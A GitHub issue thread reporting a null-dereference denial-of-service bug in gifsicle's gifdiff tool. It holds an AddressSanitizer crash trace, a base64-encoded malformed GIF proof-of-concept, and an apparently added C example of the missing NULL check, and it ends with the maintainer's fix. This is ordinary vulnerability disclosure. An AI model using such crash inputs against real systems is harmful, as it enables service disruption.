
null dereference in apply_image #130

Closed
nrathaus opened this issue Apr 8, 2018 · 5 comments

Comments

@nrathaus

nrathaus commented Apr 8, 2018

This was discovered by: dorkerdevil dorkerdevil@protonmail.com - who asked us to report it to you.

There is a null dereference vulnerability (denial of service) affecting gifdiff in gifsicle v1.91.
A screenshot and PoC file are attached.

Note: @@ refers to the PoC file which is attached, and that PoC file is used twice, which means the same PoC file will be in both places.

PoC:

```
:~/gifsicle-asan/src/gifdiffout/crashes# ../../gifdiff -w -B @@ @@
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #0:
gifdiff: error: unknown block type 102 at file offset 13
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #1:
gifdiff: error: bad graphic extension
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #0:
gifdiff: error: unknown block type 102 at file offset 13
gifdiff: While reading ‘id:000022,sig:06,src:000000,op:havoc,rep:4’ frame #1:
gifdiff: error: bad graphic extension
ASAN:SIGSEGV

==21423==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004450f8 bp 0x0c18000017f4 sp 0x7fff9f1b44b0 T0)
#0 0x4450f7 in apply_image /root/geeknik/gifsicle-asan/src/gifdiff.c:121
#1 0x44ab8d in compare /root/geeknik/gifsicle-asan/src/gifdiff.c:316
#2 0x40246b in main /root/geeknik/gifsicle-asan/src/gifdiff.c:625
#3 0x7f7821e2382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x4027f8 in _start (/root/geeknik/gifsicle-asan/src/gifdiff+0x4027f8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/geeknik/gifsicle-asan/src/gifdiff.c:121 apply_image
==21423==ABORTING
```

@nrathaus
Author

nrathaus commented Apr 8, 2018

File: id:000022,sig:06,src:000000,op:havoc,rep:4

Base64 encoded file
R0lGODlhIAAgABMBAGbMzP///wAAADOZZpn/zAAAAAAAAAAAACH5BAAAAAAALAAAAAAgACAAAAOLGLrc/miqpk7ISau9S5DNu/8fICgaYJ5oqqbDGJRrLAMtScw468J5Xr+3nm8XFM5+PGMMWYwxcMyZ40iULQaDhSzqDGBNisGyuhUDrmNb72pWcaXhtmiqppsM/27pVi8UX96rcQpDf3V+QD12d4NKK2+Lc4qOKI2RJ5OUNHz///8AAAAzmWaZ/8wAAAAAAAAAAAAh+QQAAAAAl0g0WJ2en6CgLi8XpaYTEKmqDwkAOw==
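As an added illustration of the failure mode behind the trace above (example code, not gifsicle's own; the `Frame` struct, the toy block layout and the function names are constructed stand-ins): a simplified frame reader that gives up and returns NULL on an unknown block type, and a compare step that checks for that NULL before applying the image instead of dereferencing it.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed stand-in for a decoded frame (not gifsicle's Gif_Image). */
typedef struct { int width, height; const uint8_t *pixels; } Frame;

/* Simplified block reader for this example's toy format: 0x2C introduces an
 * image (width, height, then width*height pixel bytes); 0x3B is the trailer;
 * any other introducer is an unknown block type. Like the reader in the trace,
 * it gives up on the frame and returns NULL when the input is malformed. */
static Frame *read_frame(const uint8_t *buf, size_t len, size_t *pos) {
    if (*pos >= len) return NULL;
    uint8_t block = buf[(*pos)++];
    if (block != 0x2C) { /* 102 (0x66) in the report is such a block */
        fprintf(stderr, "error: unknown block type %u at offset %zu\n", block, *pos - 1);
        return NULL;
    }
    if (*pos + 2 > len) return NULL;
    int w = buf[(*pos)++], h = buf[(*pos)++];
    if (w == 0 || h == 0 || (size_t)w * h > len - *pos) return NULL;
    Frame *f = malloc(sizeof *f);
    if (!f) return NULL;
    f->width = w; f->height = h; f->pixels = buf + *pos;
    *pos += (size_t)w * h;
    return f;
}

/* Counts differing pixels. Both frames must be valid: calling this with a
 * frame that failed to read is the NULL dereference the trace shows. */
static long apply_image_diff(const Frame *a, const Frame *b) {
    if (a->width != b->width || a->height != b->height) return -2;
    long diff = 0;
    for (int i = 0; i < a->width * a->height; i++)
        diff += a->pixels[i] != b->pixels[i];
    return diff;
}

/* Hardened compare step: a frame that did not decode is reported as a
 * read error (-1) rather than passed on to apply_image_diff. */
long compare_streams(const uint8_t *a, size_t alen,
                     const uint8_t *b, size_t blen) {
    size_t pa = 0, pb = 0;
    Frame *fa = read_frame(a, alen, &pa), *fb = read_frame(b, blen, &pb);
    long r = (fa && fb) ? apply_image_diff(fa, fb) : -1; /* the NULL check */
    free(fa); free(fb);
    return r;
}
```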

@kohler kohler closed this as completed in e2d5c01 Apr 8, 2018
@kohler
Owner

kohler commented Apr 8, 2018

Thanks for the report!

@nrathaus
Author

Has this been resolved?

@kohler
Owner

kohler commented Aug 12, 2018

Yes. That is why I closed the issue with a commit reference.

@nrathaus
Author

Ok, thanks
